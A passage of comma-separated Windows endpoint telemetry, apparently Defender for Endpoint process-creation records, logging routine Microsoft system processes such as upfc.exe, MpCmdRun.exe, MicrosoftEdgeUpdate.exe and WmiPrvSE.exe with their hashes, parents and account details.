+914,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:09:54.402469200+00:00,17512,SenseCncProxy.exe,4576,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:09:54.468583300+00:00,2021-06-25 01:10:47.181287600+00:00,a84d3d10-444d-48f6-be57-6abc3d4ad06e,computerpii_0a470890c60768167990033d701e7bd881398861,182997,False,10.7740.19041.1052,False,11540474045137006,,11540474045178651,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+915,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:35:54.260588700+00:00,13420,upfc.exe,Upfc.exe /launchtype periodic /cv G+AgT6zpLEGUBqkrxqTwWA.0,PortableExecutable,2019-12-07 09:08:33.284887700+00:00,C:\Windows\System32\upfc.exe,121392,299ea296575ccb9d2c1a779062535d5c,ee44fe14df89c4e5eaf8398f8fb4823fd910c5a94d913653d6b9e831254f6cc2,2497169c13b0ba46a6be8a1fe493b250094079b7,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:35:54.472654700+00:00,2021-06-25 00:38:05.837105900+00:00,b2672313-bd3b-4210-8c6f-241c4e4cdde3,computerpii_0a470890c60768167990033d701e7bd881398861,180372,False,10.7740.19041.1052,False,11540474045136906,,11540474045178101,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,UPFC,upfc.exe,Updateability From SCM
+916,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 06:56:04.501587700+00:00,17808,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey EB6A84C0-3660-837E-9B12-883F8F52244E ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 06:56:05.375913900+00:00,2021-06-24 06:58:07.536123200+00:00,39b12f8a-2854-470c-8c96-2854992fdcf7,computerpii_0a470890c60768167990033d701e7bd881398861,176751,False,10.7740.19041.1052,False,11540474045145394,,11540474045176986,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+917,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 07:41:19.541584500+00:00,16036,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey E9671A2D-919D-903D-50DA-D2E757E46AAB ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:41:19.804494400+00:00,2021-06-24 07:43:29.474664900+00:00,120e55f8-c461-474a-a00d-aabe58d438d2,computerpii_0a470890c60768167990033d701e7bd881398861,177210,False,10.7740.19041.1052,False,11540474045145394,,11540474045177166,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+918,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:50:42.327018100+00:00,16576,upfc.exe,Upfc.exe /launchtype periodic /cv yaNBQ7ZgH0qYmperAQ++yg.0,PortableExecutable,2019-12-07 09:08:33.284887700+00:00,C:\Windows\System32\upfc.exe,121392,299ea296575ccb9d2c1a779062535d5c,ee44fe14df89c4e5eaf8398f8fb4823fd910c5a94d913653d6b9e831254f6cc2,2497169c13b0ba46a6be8a1fe493b250094079b7,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:50:42.563785+00:00,2021-06-23 00:52:50.772485900+00:00,13c45ac2-6d40-4cb0-bc01-b1eeca1e0bf4,computerpii_0a470890c60768167990033d701e7bd881398861,154162,False,10.7740.19041.1052,False,11540474045136906,,11540474045171735,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,UPFC,upfc.exe,Updateability From SCM
+919,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:50:42.330878900+00:00,7400,taskhostw.exe,taskhostw.exe SYSTEM,PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:50:42.564799100+00:00,2021-06-23 00:52:50.772523600+00:00,2dc7a0c8-8017-4d3d-a5fb-6a9ebc2ab3b9,computerpii_0a470890c60768167990033d701e7bd881398861,154163,False,10.7740.19041.1052,False,11540474045136925,,11540474045171737,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,16512,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+920,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:50:42.332623900+00:00,10620,wermgr.exe,wermgr.exe -upload,PortableExecutable,2021-06-09 01:20:48.990190700+00:00,C:\Windows\System32\wermgr.exe,228664,9e589e1cc3656da4013dd6effb304cc9,8ff10133fa972e400bc6b8a4ce92b55326fea4f99d1d9eb3331fdab85289b9ed,00e57965ce237ded3b414379d0e6a22ec09375d2,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:50:42.629452+00:00,2021-06-23 00:52:50.772629600+00:00,d171ce69-c1f0-4e6e-b70c-cbefb084991c,computerpii_0a470890c60768167990033d701e7bd881398861,154166,False,10.7740.19041.1052,False,11540474045136925,,11540474045171738,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,WerMgr,WerMgr,Windows Problem Reporting
+921,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:50:42.384566300+00:00,13976,OfficeC2RClient.exe,"""OfficeC2RClient.exe"" /WatchService",PortableExecutable,2021-06-12 08:56:59.029539+00:00,C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe,23080816,0dc113fc1d718e1951bb9c59f2ac9547,1c8f95ff4650c68fffc16576e905462a6b8e1b965156073701c8ab7732a06367,78627ab451d9269178de0c336d68bdb14475501b,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:50:42.809706800+00:00,2021-06-23 00:52:50.772767300+00:00,03812594-f6e2-43fd-b2cd-4c2cc50448da,computerpii_0a470890c60768167990033d701e7bd881398861,154170,False,10.7740.19041.1052,False,11540474045136925,,11540474045171739,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20688,OfficeC2RClient.exe,OfficeC2RClient.exe,Microsoft Office Click-to-Run Client
+922,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:50:42.496798500+00:00,9344,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /ua /installsource scheduler",PortableExecutable,2020-09-27 14:36:21.069830800+00:00,C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,213392,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:50:42.946458400+00:00,2021-06-23 00:52:50.772874800+00:00,52055f7b-cc1d-4708-98d5-c1197e55be56,computerpii_0a470890c60768167990033d701e7bd881398861,154173,False,10.7740.19041.1052,False,11540474045136925,,11540474045171741,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update
+923,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:50:50.023400100+00:00,15300,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /svc",PortableExecutable,2020-09-27 14:36:21.069830800+00:00,C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,213392,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:50:50.305705400+00:00,2021-06-23 00:52:50.774292600+00:00,69e7c1e2-11d5-4ba5-a6f3-508d9ad9328f,computerpii_0a470890c60768167990033d701e7bd881398861,154210,False,10.7740.19041.1052,False,11540474045136906,,11540474045171745,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update
+924,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:00.374452800+00:00,10704,SenseCncProxy.exe,3940,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:01.363054+00:00,2021-06-23 00:52:50.774619400+00:00,578847c9-ddd1-4b5e-a3c7-224561a46dfc,computerpii_0a470890c60768167990033d701e7bd881398861,154219,False,10.7740.19041.1052,False,11540474045137006,,11540474045171747,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+925,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:12.514149700+00:00,17040,SIHClient.exe,sihclient.exe  /cv yaNBQ7ZgH0qYmperAQ++yg.0.1,PortableExecutable,2021-04-14 01:10:32.937492400+00:00,C:\Windows\System32\SIHClient.exe,361056,fb01bf59d3dcf61f005b1cb038046d2f,8f0d59f251400d5897523658666b7ca2c497f69b034e71e8bd44065de07ae1bf,b15a31de350b8312868f2f2d9ed3973a7c34f9ac,299ea296575ccb9d2c1a779062535d5c,ee44fe14df89c4e5eaf8398f8fb4823fd910c5a94d913653d6b9e831254f6cc2,2497169c13b0ba46a6be8a1fe493b250094079b7,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 00:50:42.327018100+00:00,16576,upfc.exe,Upfc.exe /launchtype periodic /cv yaNBQ7ZgH0qYmperAQ++yg.0,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:12.562504700+00:00,2021-06-23 00:52:50.774691600+00:00,87f60245-416c-43fb-8964-403ed3b76286,computerpii_0a470890c60768167990033d701e7bd881398861,154221,False,10.7740.19041.1052,False,11540474045171735,,11540474045171748,2021-06-23 00:50:42.327018100+00:00,16576,2021-06-23 00:50:42.327018100+00:00,\Device\HarddiskVolume3\Windows\System32\upfc.exe,16576,128,TerminateProcessStartkey,C:\Windows\System32,121392,1973-05-29 11:25:14+00:00,2019-12-07 09:08:33.284887700+00:00,2021-06-23 00:50:42.330037200+00:00,2019-12-07 09:08:33.284887700+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,UPFC,upfc.exe,Updateability From SCM,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,SIH Client,sihclient.exe,SIH Client
+926,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:12.679321400+00:00,9120,WmiPrvSE.exe,wmiprvse.exe -secured -Embedding,PortableExecutable,2020-10-09 20:47:18.396187600+00:00,C:\Windows\System32\wbem\WmiPrvSE.exe,496640,60ff40cfd7fb8fe41ee4fe9ae5fe1c51,2198a7b58bccb758036b969ddae6cc2ece07565e2659a7c541a313a0492231a3,3ea7cc066317ac45f963c2227c4c7c50aa16eb7c,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:13.563025700+00:00,2021-06-23 00:52:50.774801600+00:00,7dd3d933-cef0-4d2b-9299-cb30e07a17d3,computerpii_0a470890c60768167990033d701e7bd881398861,154224,False,10.7740.19041.1052,False,11540474045136908,,11540474045171749,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,Wmiprvse.exe,Wmiprvse.exe,WMI Provider Host
+927,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:19.134613900+00:00,3536,dllhost.exe,DllHost.exe /Processid:{338B40F9-9D68-4B53-A793-6B9AA0C5F63B},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.215235500+00:00,2021-06-23 00:52:50.775086600+00:00,94bcea7d-f8cf-4757-8475-262366c35a3d,computerpii_0a470890c60768167990033d701e7bd881398861,154232,False,10.7740.19041.1052,False,11540474045136908,,11540474045171750,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 